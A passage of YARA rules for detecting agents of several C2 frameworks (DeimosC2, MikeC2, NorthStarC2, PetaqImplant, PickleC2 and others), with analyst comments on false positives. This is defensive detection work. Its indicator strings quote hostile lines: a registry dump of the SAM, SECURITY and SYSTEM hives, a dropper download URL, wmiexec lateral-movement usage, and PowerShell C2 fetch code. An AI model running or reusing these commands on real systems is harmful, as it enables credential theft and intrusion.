        $s15 = "https://api.dropboxapi.com/2/files/list_folder" wide fullword
        $s16 = "https://api.dropboxapi.com/2/files/move" wide fullword
        $s17 = "https://api.dropboxapi.com/2/files/delete" wide fullword
        $s18 = "clipboardlogger" wide fullword
        $s19 = "OK - FILE DOWNLOADED AT: " wide fullword
        $s20 = "shellProcess" ascii fullword
    condition:
        hash.sha256(0, filesize) == "ba606da59063a837e704a49b065979ad4ea4b508c8600e520a8c69948332661b"
        or (
            pe.characteristics & pe.EXECUTABLE_IMAGE
            and uint16(0) == 0x5a4d
            and filesize < 70KB
            and 1 of ($x*)
            and 4 of them
        )
}
|
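import "hash"
import "pe"

// DeimosC2 - lsadump.exe, minidump.exe, ntdsdump.exe, samdump.exe,
// screengrab.exe (Go-built Windows agents).
// The 128-char $x/$s strings are slices of the Go linker's packed string
// table (runtime/tls/net/http messages run together); their exact adjacency
// depends on the binary's whole string set, so they are build-specific but
// can recur in other Go binaries with a similar import set - treat non-hash
// hits as leads. $s18/$s20 are fullword suffix fragments of longer DLL names
// and carry little weight. The imports (DuplicateHandle, SwitchToThread) are
// standard Go runtime imports on Windows.
// Fix: the original declared the "runtime: GetQueuedCompletionStatus ..."
// string as both $x4 and $s19, so one hit counted twice toward "4 of them";
// the duplicate $s19 is dropped.
// NOTE(review): as written, "or (all of them)" sits at the top level, outside
// the pe.* conjunction, unlike the sibling C3/Callidus rules; with 19 long
// strings that branch is strict anyway, so it is left as the author wrote it.
// hash.sha256 is the leftmost operand and is computed over every scanned file.
rule DeimosC2_Win {
    meta:
        description = "DeimosC2 - lsadump.exe, minidump.exe, ntdsdump.exe, samdump.exe, screengrab.exe"
        sha256_1 = "d5a3de19ef84c040a5b0058fb4fb2a036c9a8db7495763bcc7b7070f16cde967"
        sha256_2 = "0c1d6b6f18811bda502df7302025950b189a75368185f9632ed96cc694ee4f8e"
        sha256_3 = "195a255225c246f360d80e4ac4287cbcd4ca8025a68631dfa3c28b365cd5a25c"
        sha256_4 = "cb72621b89c8a1d9686846183e86a09d7564d085927be2f483d739aeb60fcfdd"
        sha256_5 = "eaf734a532b9312168cbcbbea00d08171546bc8560b7131904bd5ea77090e9d3"
    strings:
        $x1 = "template: no template %q associated with template %qtls: received a session ticket with invalid lifetimetls: server selected uns"
        $x2 = "tls: client certificate used with invalid signature algorithmtls: server sent a ServerHello extension forbidden in TLS 1.3tls: u"
        $x3 = "bytes.Buffer: reader returned negative count from Readcertificate is not valid for requested server name: %wcryptobyte: Builder "
        $x4 = "runtime: GetQueuedCompletionStatus returned invalid mode= tls: server changed cipher suite after a HelloRetryRequesturlPartNoneu"
        $x5 = "runtime: netpoll: PostQueuedCompletionStatus failed (errno= tls: initial handshake had non-empty renegotiation extensiontls: no "
        $x6 = "invalid network interface nameinvalid pointer found on stacklength mismatch in decodeArraylength mismatch in ignoreArraylooking "
        $s7 = "oot of negative numberstream error: stream ID %d; %vsync: inconsistent mutex statesync: unlock of unlocked mutextext/javascript;"
        $s8 = "non-IPv4 addressnon-IPv6 addressntrianglelefteq;object is remotepacer: H_m_prev=proxy-connectionquoted-printablereflect mismatch"
        $s9 = "= flushGen for type gfreecnt= pages at runqsize= runqueue= s.base()= spinning= stopwait= stream=%d sweepgen sweepgen= target"
        $s10 = "y typereflect: Out of non-func type rpc: error executing template:rpc: service already defined: runqputslow: queue is not fullru"
        $s11 = "nt array or slice: length exceeds input size (%d elements)http2: Transport conn %p received error from processing frame %v: %vht"
        $s12 = "pc= throwing= until pc=%!Weekday(%s|%s%s|%s, bound = , limit = /dev/stdin01234567891220703125127.0.0.1:6103515625: parsing :auth"
        $s13 = "[originating from goroutine _html_template_rcdataescaper_html_template_srcsetescaper_html_template_urlnormalizerasn1: string not"
        $s14 = "supported versions satisfy MinVersion and MaxVersionnet/http: invalid Cookie.Domain %q; dropping domain attributerpc.Register: a"
        $s15 = "sched={pc: /* %s */null but progSize nmidlelocked= on zero Value out of range procedure in to finalizer untyped args $htmlt"
        $s16 = "internal/poll.(*ioSrv).ExecIO" ascii fullword
        $s17 = "os.Executable" ascii fullword
        $s18 = "rof.dll" ascii fullword
        $s20 = "i32.dll" ascii fullword
    condition:
        hash.sha256(0, filesize) == "d5a3de19ef84c040a5b0058fb4fb2a036c9a8db7495763bcc7b7070f16cde967"
        or hash.sha256(0, filesize) == "0c1d6b6f18811bda502df7302025950b189a75368185f9632ed96cc694ee4f8e"
        or hash.sha256(0, filesize) == "195a255225c246f360d80e4ac4287cbcd4ca8025a68631dfa3c28b365cd5a25c"
        or hash.sha256(0, filesize) == "cb72621b89c8a1d9686846183e86a09d7564d085927be2f483d739aeb60fcfdd"
        or hash.sha256(0, filesize) == "eaf734a532b9312168cbcbbea00d08171546bc8560b7131904bd5ea77090e9d3"
        or (
            pe.imports("kernel32.dll", "DuplicateHandle")
            and pe.imports("kernel32.dll", "SwitchToThread")
            and pe.characteristics & pe.EXECUTABLE_IMAGE
            and (uint16(0) == 0x5a4d and filesize < 22000KB and (1 of ($x*) and 4 of them))
        )
        or (all of them)
}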
|
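import "hash"

// DeimosC2 Linux tooling (screengrab.elf, shadowdump.elf).
// Caveat for hunters: every $x string is a slice of the Go runtime/stdlib string table and the
// generic branch fires on a single one of them in any ELF under 23 MB. That is effectively
// "any Go ELF binary", so expect a high false-positive rate; use the generic branch for
// scoped hunts and rely on the two sha256 clauses (kept last so the whole-file hash is only
// computed after the cheap checks fail) for exact-sample confirmation.
rule DeimosC2_Unix {
    meta:
        description = "DeimosC2 - screengrab.elf, shadowdump.elf"
        sha256_1 = "cf654c92792fd8964025e9dd7dc2dc0181b15c4868134ec92ad4ac166dc99050"
        sha256_2 = "2e8341a042e4c26fa6cfe2606075a56aa47587b7ca934789da3cb486cca871b7"
    strings:
        $x1 = "fmt: unknown base; can't happenhttp2: connection error: %v: %vin literal null (expecting 'l')in literal null (expecting 'u')in l"
        $x2 = "bytes.Buffer: reader returned negative count from Readcertificate is not valid for requested server name: %wcryptobyte: Builder "
        $x3 = "59604644775390625: missing method ; SameSite=StrictCOMPRESSION_ERRORCirculateNotify {ConfigureNotify {DiacriticalAcute;Diacritic"
        $x4 = "strings.Builder.Grow: negative countsyntax error scanning complex numbertls: keys must have at least one keytls: server did not "
        $x5 = "adding nil Certificate to CertPoolbad scalar length: %d, expected an't evaluate field %s in type %scan't handle %s for arg of"
        $x6 = "runtime: text offset base pointer out of rangeruntime: type offset base pointer out of rangeslice bounds out of range [:%x] with"
        $x7 = "IDS_Trinary_OperatorInsufficient StorageLeftArrowRightArrow;MAX_HEADER_LIST_SIZEMeroitic_HieroglyphsNegativeMediumSpace;NotGreat"
        $x8 = "s.allocCount != s.nelems && freeIndex == s.nelemsslice bounds out of range [::%x] with capacity %ystrconv: internal error, rest "
        $x9 = "tls: client certificate contains an unsupported public key of type %Ttls: handshake message of length %d bytes exceeds maximum o"
        $x10 = "lock: lock countslice bounds out of rangesocket type not supportedstartm: p has runnable gsstoplockedm: not runnablestrict-trans"
        $x11 = "got CONTINUATION for stream %d; expected stream %dhttp: putIdleConn: CloseIdleConnections was calledhttp: suspiciously long trai"
        $x12 = "%s slice too big: %d elements of %d bytes34694469519536141888238489627838134765625MapIter.Next called on exhausted iteratorTime."
        $x13 = ", RecursionAvailable: .localhost.localdomain/etc/apache/mime.types/etc/ssl/ca-bundle.pem/lib/time/zoneinfo.zip/usr/local/share/c"
        $x14 = "runtime: p.gcMarkWorkerMode= runtime: split stack overflowruntime: stat underflow: val runtime: sudog with non-nil cruntime: sum"
        $x15 = "173472347597680709441192448139190673828125867361737988403547205962240695953369140625MapIter.Value called on exhausted iteratorPR"
        $x16 = "gob: cannot encode nil pointer of type heapBitsSetTypeGCProg: small allocationhttp: putIdleConn: keep alives disabledinvalid ind"
        $x17 = "HumpEqual;IP addressKeep-AliveKeyPress {KharoshthiLeftArrow;LeftFloor;Leftarrow;LessTilde;ManichaeanMellintrf;Message-IdMinusPlu"
        $x18 = "checkdead: no m for timercontext deadline exceedederror decoding []byte: %sexpected string; found %sexplicit tag has no childhtt"
        $x19 = "template: no template %q associated with template %qtls: received a session ticket with invalid lifetimetls: server selected uns"
        $x20 = "file descriptor in bad statefindrunnable: netpoll with pgcstopm: negative nmspinninggeneral SOCKS server failuregob: cannot enco"
    condition:
        // generic branch: ELF magic + size cap + ONE Go string table fragment (broad, see header)
        (
            uint16(0) == 0x457f
            and filesize < 23000KB
            and 1 of ($x*)
        )
        // exact-sample fallback
        or hash.sha256(0, filesize) == "cf654c92792fd8964025e9dd7dc2dc0181b15c4868134ec92ad4ac166dc99050"
        or hash.sha256(0, filesize) == "2e8341a042e4c26fa6cfe2606075a56aa47587b7ca934789da3cb486cca871b7"
}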
|
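import "hash"
import "pe"

// GrimReaperC2 agent (Agent_x64.exe, Agent_x86.exe).
// The status/format strings ($s2-$s9, $s11-$s17) are the agent's own console output and are the
// discriminating part of the rule; $s1, $s10 (manifest XML), $s18 (UA prefix) and $s19 are
// generic and should not be relied on alone. The generic branch pairs the strings with a
// WinINet + process-enumeration import set. Hash clauses are placed last so the whole-file hash
// is only computed when the cheaper checks fail.
rule GrimReaperC2_Agent {
    meta:
        description = "GrimReaperC2 - Agent_x64.exe, Agent_x86.exe"
        sha256_1 = "83c92e978a094fbc4d2c5f8d009a28da54c5677c1d55af61c3c2e2c33ea712af"
        sha256_2 = "b059fc8cce2a0ca169dd3aae76c13d43a3fee0821a2bbb5b0d8b97d067c6eb08"
    strings:
        $s1 = " <requestedExecutionLevel level='asInvoker' uiAccess='false' />" ascii fullword
        $s2 = " -> CommandId: %u" ascii fullword
        $s3 = "[+] agent is identifying.." ascii fullword
        $s4 = "InternetReadFile Error: (%lu)" ascii fullword
        $s5 = "Error reading file %ld" ascii fullword
        $s6 = "Couldn't get file size" ascii fullword
        $s7 = "[+] Sending %lu bytes: %.*s" ascii fullword
        $s8 = "[+] Got task ID: %u" ascii fullword
        $s9 = "HttpSendRequest Error: (%lu)" ascii fullword
        $s10 = " <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">" ascii fullword
        $s11 = "fetching commands.." ascii fullword
        $s12 = "got token: %s" ascii fullword
        $s13 = "Error writting file." ascii fullword
        $s14 = "Opening file %s for %s" ascii fullword
        $s15 = "writing to file" ascii fullword
        $s16 = "closing file" ascii fullword
        $s17 = "listing files" ascii fullword
        $s18 = "Mozilla/5.0" ascii fullword
        $s19 = "connect" ascii fullword
    condition:
        (
            pe.imports("advapi32.dll", "OpenProcessToken")
            and pe.imports("wininet.dll", "InternetConnectW")
            and pe.imports("kernel32.dll", "FindNextFileW")
            and pe.imports("kernel32.dll", "CreateToolhelp32Snapshot")
            and pe.imports("kernel32.dll", "Process32NextW")
            and (
                (uint16(0) == 0x5a4d and filesize < 60KB and 8 of them)
                or all of them
            )
        )
        // exact-sample fallback
        or hash.sha256(0, filesize) == "83c92e978a094fbc4d2c5f8d009a28da54c5677c1d55af61c3c2e2c33ea712af"
        or hash.sha256(0, filesize) == "b059fc8cce2a0ca169dd3aae76c13d43a3fee0821a2bbb5b0d8b97d067c6eb08"
}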
|
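import "hash"
import "pe"

// FlyingAFalseFlag "Exchanger" component (Exchanger_x64.exe, Exchanger_x86.exe).
// The EWS SOAP fragments ($s2-$s5, $s12, $s13, $s18, $s19) also occur in legitimate Exchange
// Web Services clients; the bracketed status strings ($s6, $s7, $s9, $s14, $s16, $s17) and the
// Outlook profile path ($s11) are what make the match meaningful, so review generic hits for
// those before escalating. Hash clauses are evaluated last so the whole-file hash is only
// computed when the cheaper checks fail.
rule FlyingAFalseFlag_Exchanger {
    meta:
        description = "FlyingAFalseFlag - Exchanger_x64.exe, Exchanger_x86.exe"
        sha256_1 = "6a5605da5f7207b1b14b798e9428c2310633664eed53ce7bdb39a6847eff6609"
        sha256_2 = "c337983b7eefbea3cc02e4d011398292ccbd475ba932ced40603a4a9a3927032"
    strings:
        $s1 = "api-ms-win-core-synch-l1-2-0.dll" wide fullword
        $s2 = "<GetItem xmlns=\"http://schemas.microsoft.com/exchange/services/2006/messages\">" ascii fullword
        $s3 = "<DeleteItem DeleteType=\"HardDelete\" xmlns=\"http://schemas.microsoft.com/exchange/services/2006/messages\">" ascii fullword
        $s4 = "<soap:Envelope xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:t="
        $s5 = "://schemas.microsoft.com/exchange/services/2006/types\" xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\""
        $s6 = "[+] Found vault creds: %s / " ascii fullword
        $s7 = "[!] Failed to execute tasking" ascii fullword
        $s8 = " <requestedExecutionLevel level='asInvoker' uiAccess='false' />" ascii fullword
        $s9 = "[+] Auto-hide rule '%s' is ready" ascii fullword
        $s10 = "mail@<domain.com>" ascii fullword
        $s11 = "%localappdata%\\Microsoft\\Outlook\\" wide fullword
        $s12 = "<AutoDiscoverSMTPAddress>" ascii fullword
        $s13 = "<m:MailboxSmtpAddress>**MAILBOX**</m:MailboxSmtpAddress>" ascii fullword
        $s14 = "[+] Got tasking... executing." ascii fullword
        // The original $s15 repeated $s4 byte-for-byte and counted twice toward "8 of them";
        // it is dropped here and the threshold is kept at 8.
        $s16 = "[!] Failed to create rule '%s'" ascii fullword
        $s17 = "[!] Failed to beacon to '%s'" ascii fullword
        $s18 = "</m:GetInboxRules>" ascii fullword
        $s19 = " </soap:Header>" ascii fullword
    condition:
        (
            pe.imports("kernel32.dll", "FindNextFileW")
            and pe.imports("kernel32.dll", "TerminateProcess")
            and pe.imports("wininet.dll", "InternetConnectA")
            and pe.imports("advapi32.dll", "LookupAccountSidA")
            and (
                (uint16(0) == 0x5a4d and filesize < 300KB and 8 of them)
                or all of them
            )
        )
        // exact-sample fallback
        or hash.sha256(0, filesize) == "6a5605da5f7207b1b14b798e9428c2310633664eed53ce7bdb39a6847eff6609"
        or hash.sha256(0, filesize) == "c337983b7eefbea3cc02e4d011398292ccbd475ba932ced40603a4a9a3927032"
}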
|
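import "pe"
import "hash"

// MikeC2 DllHijack.dll.
// Only $s1 and $s4 are specific; $s2, $s3, $s6-$s8 are manifest XML found in most MSVC builds
// and $s9-$s16 are short relocation/opcode byte patterns with little meaning on their own.
// The generic branch therefore also requires the remote-thread import triple. Hash clause is
// evaluated last so the whole-file hash is only computed when the cheaper checks fail.
rule MikeC2_DllHijack {
    meta:
        description = "MikeC2 - DllHijack.dll"
        sha256 = "28bcbcf21baaf1310fbda8a9e2d34d480d1f8e5f65d87abba6326a71565d1714"
    strings:
        $s1 = "DllHijack.dll" ascii fullword
        $s2 = " <requestedExecutionLevel level='asInvoker' uiAccess='false' />" ascii fullword
        $s3 = " <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">" ascii fullword
        $s4 = "tester" ascii fullword
        $s5 = ".rdata$voltmd" ascii fullword
        $s6 = " </trustInfo>" ascii fullword
        $s7 = " </requestedPrivileges>" ascii fullword
        $s8 = " <requestedPrivileges>" ascii fullword
        $s9 = ";);.;A;a;~;" ascii fullword
        $s10 = "=K=T=]=k=t=" ascii fullword
        $s11 = "SVWj h" ascii fullword
        $s12 = "2*2K2P2i2n2{2" ascii fullword
        $s13 = "11}1" ascii fullword
        $s14 = "0#0/0G0W0]0t0" ascii fullword
        $s15 = "646C6L6Y6o6" ascii fullword
        $s16 = "5 535A5G5M5S5Y5_5f5m5t5{5" ascii fullword
    condition:
        (
            pe.imports("kernel32.dll", "WriteProcessMemory")
            and pe.imports("kernel32.dll", "CreateToolhelp32Snapshot")
            and pe.imports("kernel32.dll", "CreateRemoteThread")
            and uint16(0) == 0x5a4d
            and filesize < 30KB
            and 8 of them
        )
        // exact-sample fallback
        or hash.sha256(0, filesize) == "28bcbcf21baaf1310fbda8a9e2d34d480d1f8e5f65d87abba6326a71565d1714"
}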
|
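import "hash"

// MikeC2 MikeDrop.exe (.NET dropper).
// Specific indicators are $s1 (download URL), $s2, $s11, $s12 and $s14; the remaining strings
// ($s3-$s6, $s8, $s13, $s16-$s19) are .NET/manifest boilerplate present in most managed binaries
// and $s7 is a common browser UA. With "8 of them" the boilerplate alone can nearly reach the
// threshold, so confirm at least one of the specific strings on generic hits. Hash clause is
// evaluated last so the whole-file hash is only computed when the cheaper checks fail.
rule MikeC2_MikeDrop {
    meta:
        description = "MikeC2 - MikeDrop.exe"
        sha256 = "933241f02ef81bef5f6b51ce3e5b3dbf242c829f899f64d2f10b0bad668a6424"
    strings:
        $s1 = "http://kali.host/MikeC2.exe" wide fullword
        $s2 = "MikeDrop.exe" wide fullword
        $s3 = " <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>" ascii fullword
        $s4 = " <assemblyIdentity version=\"1.0.0.0\" name=\"MyApplication.app\"/>" ascii fullword
        $s5 = ".NETFramework,Version=v4.7.2" ascii fullword
        $s6 = ".NET Framework 4.7.2" ascii fullword
        $s7 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36" wide fullword
        $s8 = " <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v2\">" ascii fullword
        $s9 = "UserName: {0}" wide fullword
        $s10 = "Domain UserName: {0}" wide fullword
        $s11 = "MikeC2.Program" wide fullword
        $s12 = "MikeDrop" wide fullword
        $s13 = " <requestedPrivileges xmlns=\"urn:schemas-microsoft-com:asm.v3\">" ascii fullword
        $s14 = "DoMikeC2" ascii fullword
        $s15 = "user-agent" wide fullword
        $s16 = "Program" ascii fullword
        $s17 = "Console" ascii fullword
        $s18 = " </trustInfo>" ascii fullword
        $s19 = "Invoke" ascii fullword
    condition:
        (
            uint16(0) == 0x5a4d
            and filesize < 20KB
            and 8 of them
        )
        // exact-sample fallback
        or hash.sha256(0, filesize) == "933241f02ef81bef5f6b51ce3e5b3dbf242c829f899f64d2f10b0bad668a6424"
}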
|
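import "hash"
import "pe"

// Nimbo-C2 Windows agent (agent.dll, Nim-compiled).
// $x1/$x2 are common-controls manifest XML and are required by "1 of ($x*)", but they are not
// specific to this tooling; the Nim symbol names ($s5, $s6, $s9, $s15) and the CLR-hosting error
// strings ($s7, $s11, $s18) are the discriminating part. $s10 and $s13 are bare decimal literals
// with no modifiers and can match incidental digit runs. Hash clause is evaluated last so the
// whole-file hash is only computed when the cheaper checks fail.
rule Nimbo_C2_WinBin_agent {
    meta:
        description = "Nimbo-C2 - agent.dll"
        sha256 = "46be6cee13305cd4175e75a37308478ff48685665bbb062b8c665d672f0f4b0d"
    strings:
        $x1 = "yIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"*\" publicKeyTok"
        $x2 = "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?><assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersio"
        $s3 = "@System.Drawing.dll" ascii fullword
        $s4 = "@System.dll" ascii fullword
        $s5 = "agent_execution_path_windows__config_30" ascii fullword
        $s6 = "agent_execution_path_linux__config_32" ascii fullword
        $s7 = "@unable to get interface of CorRuntimeHost" ascii fullword
        $s8 = "@System.CodeDom.Compiler.CompilerParameters" ascii fullword
        $s9 = "execute_encoded_powershell__windowsZutilsZclr_5" ascii fullword
        $s10 = "3674214126"
        $s11 = "@unable to get interface of CLRRuntimeHost" ascii fullword
        $s12 = "@Ws2_32.dll" ascii fullword
        $s13 = "2969576475"
        $s14 = "@GenerateExecutable" ascii fullword
        $s15 = "sleep_on_execution__config_28" ascii fullword
        $s16 = "queryProcessCycleTime" ascii fullword
        $s17 = "queryIdleProcessorCycleTime" ascii fullword
        $s18 = "@unable to start CorRuntimeHost" ascii fullword
        $s19 = "SIGSEGV: Illegal storage access. (Attempt to read from nil?)" ascii fullword
    condition:
        (
            pe.imports("kernel32.dll", "VirtualProtect")
            and uint16(0) == 0x5a4d
            and filesize < 1000KB
            and 1 of ($x*)
            and 4 of them
        )
        // exact-sample fallback
        or hash.sha256(0, filesize) == "46be6cee13305cd4175e75a37308478ff48685665bbb062b8c665d672f0f4b0d"
}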
|
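import "hash"

// Nimbo-C2 Linux agent (agent.so, Nim-compiled).
// Most $s strings are Nim runtime/GC symbol names ($s7-$s16, $s18-$s20) and $s5/$s6 are Nim
// default signal messages; they identify "a Nim binary" rather than Nimbo-C2. The agent-specific
// symbols are $s1, $s2, $s4 and $s17 — check for those on generic hits. $s3 ("AWAVAUA") is a
// common x64 prologue byte run. Hash clause is evaluated last so the whole-file hash is only
// computed when the cheaper checks fail.
rule Nimbo_C2_UnixBin_agent {
    meta:
        description = "Nimbo-C2 - agent.so"
        sha256 = "9fb7870c7c1dc8d2dd61ba77e34efe580ad0151c9b59b201b17a45a211d8ff49"
    strings:
        $s1 = "agent_execution_path_linux__config_32" ascii fullword
        $s2 = "agent_execution_path_windows__config_30" ascii fullword
        $s3 = "AWAVAUA" ascii fullword
        $s4 = "sleep_on_execution__config_28" ascii fullword
        $s5 = "SIGSEGV: Illegal storage access. (Attempt to read from nil?)" ascii fullword
        $s6 = "SIGPIPE: Pipe closed." ascii fullword
        $s7 = "reportUnhandledError__system_2855" ascii fullword
        $s8 = "reportUnhandledErrorAux__system_2752" ascii fullword
        $s9 = "getBigChunk__system_4510" ascii fullword
        $s10 = "getBottom__system_3996" ascii fullword
        $s11 = "getActiveStack__system_5401" ascii fullword
        $s12 = "cellSetGet__system_4918" ascii fullword
        $s13 = "doOperation__system_5296" ascii fullword
        $s14 = "getHugeChunk__system_4525" ascii fullword
        $s15 = "intSetGet__system_4180" ascii fullword
        $s16 = "sweep__system_5710" ascii fullword
        $s17 = "NTIhttpheaders__FbZeO4trJhT2CCJ9aLxejqw_" ascii fullword
        $s18 = "getDiscriminant__system_3619" ascii fullword
        $s19 = "getFileHandle__systemZio_228" ascii fullword
        $s20 = "getOccupiedMem__system_1936" ascii fullword
    condition:
        (
            uint16(0) == 0x457f
            and filesize < 600KB
            and 8 of them
        )
        // exact-sample fallback
        or hash.sha256(0, filesize) == "9fb7870c7c1dc8d2dd61ba77e34efe580ad0151c9b59b201b17a45a211d8ff49"
}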
|
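import "hash"

// NorthStarC2 stager (NorthstarStager.exe, .NET).
// Two strings from the original rule are dropped: $s2 was a single space with "fullword", which
// matches almost any file and only inflated the "8 of them" count, and $s14 repeated $s13
// byte-for-byte. The threshold is kept at 8 over the remaining 18 strings. The registry-hive
// export command line ($s1) and the SAM-dump / UAC-bypass names ($s6, $s9, $s11, $s17, $s20) are
// the high-value indicators. Hash clause is evaluated last so the whole-file hash is only
// computed when the cheaper checks fail.
rule NorthStarC2 {
    meta:
        description = "NorthStarC2 - NorthstarStager.exe"
        sha256 = "f7f92158b53e6bcd8b2eb293e4802e2759c1943096e2da3d03486f36f053801c"
    strings:
        $s1 = "reg.exe save hklm\\sam c:\\temp\\sam.save & reg.exe save hklm\\security c:\\temp\\security.save & reg.exe save hklm\\system c:" wide
        $s3 = "SystemHealthCheck.exe" wide fullword
        $s4 = "processCommand" ascii fullword
        $s5 = "NorthstarStager.exe" wide fullword
        $s6 = "_SAMDUMP.zip" wide fullword
        $s7 = "login.php" wide fullword
        $s8 = "_getProcesses" ascii fullword
        $s9 = "bypassuac" wide fullword
        $s10 = "Probably bypassed check new connection" wide fullword
        $s11 = "samdump" wide fullword
        $s12 = "set_UseShellExecute" ascii fullword
        $s13 = " <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\" />" ascii fullword
        $s15 = "uploadfile" wide fullword
        $s16 = "getjuice.php" wide fullword
        $s17 = "_samDump" ascii fullword
        $s18 = "Cmd mode enabled, all commands will be redirect to CMD. Response delay is : " wide fullword
        $s19 = "Command not found, you may need to enable CMD mode <enablecmd or enable cmd>" wide fullword
        $s20 = "SOFTWARE\\Classes\\mscfile\\shell\\open\\command" wide fullword
    condition:
        (
            uint16(0) == 0x5a4d
            and filesize < 70KB
            and 8 of them
        )
        // exact-sample fallback
        or hash.sha256(0, filesize) == "f7f92158b53e6bcd8b2eb293e4802e2759c1943096e2da3d03486f36f053801c"
}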
|
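import "hash"

// PetaqImplant (PetaqImplant.exe, .NET).
// The $x strings are the implant's built-in usage/help text and are highly specific; the $s
// strings are further help lines and status messages. Because the help text is embedded as
// wide strings, this rule will also fire on documentation or scripts that quote it verbatim —
// the MZ check limits that but does not remove it. Hash clause is evaluated last so the
// whole-file hash is only computed when the cheaper checks fail.
rule PetaqImplant {
    meta:
        description = "PetaqImplant - PetaqImplant.exe"
        sha256 = "8ed63f7ea1a79dbf2cc9a338feff1dd4491a9daac38d4c86f67d7211783ae272"
    strings:
        $x1 = " exec cmd.exe /c dir" wide fullword
        $x2 = " execthread cmd.exe /c dir" wide fullword
        $x3 = " lateralmovement wmiexec domain=galaxy username=administrator password=Password3 host=10.0.0.1 command=\"powershell " wide fullword
        $x4 = " lateralmovement wmiexec domain=DOMAIN username=USER password=PASSWORD host=REMOTEHOST command=\"COMMANDTORUN\"" wide fullword
        $s5 = "Invalid credentials error may occur if the logged on user has no access to remote server IPC$. Try this before linking 'net use " wide
        $s6 = "The process is running with the payload injected." wide fullword
        $s7 = " exec-sharpassembly url http://127.0.0.1/test.exe" wide fullword
        $s8 = " exec-shellcode url http://127.0.0.1/Shellcode.bin ARCH64 T1" wide fullword
        $s9 = " exec-shellcode url http://127.0.0.1/Shellcode.bin ARCH32 T2" wide fullword
        $s10 = "Execute a command/binary:" wide fullword
        $s11 = "* link smb://192.168.1.1/NamedPipeName" wide fullword
        $s12 = "Setting the startup information for the process to inject." wide fullword
        $s13 = " download c:\\windows\\temp\\1.txt" wide fullword
        $s14 = "Execute Shellcode:" wide fullword
        $s15 = "Pushing the payload to the process memory." wide fullword
        $s16 = "Compile & Execute .NET source code:" wide fullword
        $s17 = "PetaqImplant.exe" wide fullword
        $s18 = "* transmit SESSIONID COMMAND" wide fullword
        $s19 = "shellcode" ascii fullword
        $s20 = "ExecShellcodeBridge" ascii fullword
    condition:
        (
            uint16(0) == 0x5a4d
            and filesize < 200KB
            and 1 of ($x*)
            and 4 of them
        )
        // exact-sample fallback
        or hash.sha256(0, filesize) == "8ed63f7ea1a79dbf2cc9a338feff1dd4491a9daac38d4c86f67d7211783ae272"
}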
|
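import "hash"

// PickleC2 PowerShell implant (powershell.ps1).
// Matches the script source itself: the magic check 0x7566 is the little-endian "fu" of a file
// that begins with "function". The original $s8 repeated $s3 byte-for-byte and counted twice
// toward "8 of them"; it is dropped and the threshold kept at 8. Leading whitespace inside the
// strings is part of the indicator — a re-indented copy of the script will miss those strings.
// Hash clause is evaluated last so the whole-file hash is only computed when the cheaper checks
// fail.
rule PickleC2 {
    meta:
        description = "PickleC2 - powershell.ps1"
        sha256 = "3a29a9b0f0e5ff1b61fa052a2173987b9f990616043791826e7426df603c43d1"
    strings:
        $s1 = "function Execute($key,$ip,$port,$implant_name,$sleep_time){" ascii fullword
        $s2 = "Execute $key $ip $port $implant_name $sleep_time" ascii fullword
        $s3 = " $LocalIPs = \"LocalIPs(\" + (([System.Net.Dns]::GetHostByName($NULL).AddressList | Select IPAddressToString | findstr \".*.*"
        $s4 = " $process.startInfo.UseShellExecute = $false" ascii fullword
        $s5 = " $Hostname = \"Machine_Name(\"+ [System.Net.Dns]::GetHostByName($NULL).Hostname + \")\"" ascii fullword
        $s6 = " $data = (Invoke-WebRequest -UseBasicParsing -Uri $file_download -Method 'POST').Content" ascii fullword
        $s7 = " $unencryptedData = $decryptor.TransformFinalBlock($bytes, 16, $bytes.Length - 16);" ascii fullword
        $s9 = " $process.StandardOutput.ReadToEnd() + $process.StandardError.ReadToEnd() " ascii fullword
        $s10 = " $cmd = \"cmd.exe\"" ascii fullword
        $s11 = " $file_download = \"ht\" + 'tp:' + \"//\" + $ip + \":$port/task/$implant_name/file.ret\"" ascii fullword
        $s12 = " elseif ($binary -eq \"execute\"){" ascii fullword
        $s13 = " -join ',').replace('IPAddressToString,-----------------,','').replace(\" \",\"\") + \")\"" ascii fullword
        $s14 = " $cmd = \"powershell.exe\"" ascii fullword
        $s15 = "function Decrypt-String($key, $encryptedStringWithIV) {" ascii fullword
        $s16 = " $task_req = (Invoke-WebRequest -UseBasicParsing -Uri $task -Method 'GET').Content" ascii fullword
        $s17 = " $task = \"ht\" + \"tp:\" + \"//\" + $ip + \":$port/task/$implant_name\"" ascii fullword
        $s18 = " $result = \"ht\" + \"tp:\" + \"//\" + $ip + \":$port/result/$implant_name\"" ascii fullword
        $s19 = " $process.startInfo.RedirectStandardError = $true" ascii fullword
        $s20 = " $results = Encrypt-String $key \"Downloaded\"" ascii fullword
    condition:
        (
            uint16(0) == 0x7566
            and filesize < 20KB
            and 8 of them
        )
        // exact-sample fallback
        or hash.sha256(0, filesize) == "3a29a9b0f0e5ff1b61fa052a2173987b9f990616043791826e7426df603c43d1"
}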
|
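import "hash"
import "pe"

// PoshC2 csc.exe payload (.NET).
// Discriminating strings are the template placeholders $s18/$s19 and the Win32 parameter names
// used for the injection P/Invoke ($s5, $s8, $s11, $s13, $s14, $s17); $s1, $s4, $s9, $s10, $s12,
// $s16, $s20 and the manifest XML are .NET/Roslyn boilerplate present in many managed binaries.
// The "pe" import is declared but unused in the condition. Hash clause is evaluated last so the
// whole-file hash is only computed when the cheaper checks fail.
rule PoshC2_Csc {
    meta:
        description = "PoshC2 - csc.exe"
        sha256 = "df8474fe610372aff283b0429626e1663b27e7c651242fbc7687ca6fd2d45caa"
    strings:
        $s1 = "csc.exe" ascii fullword
        $s2 = " <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>" ascii fullword
        $s3 = " <assemblyIdentity version=\"1.0.0.0\" name=\"MyApplication.app\"/>" ascii fullword
        $s4 = "Microsoft.CodeAnalysis" ascii fullword
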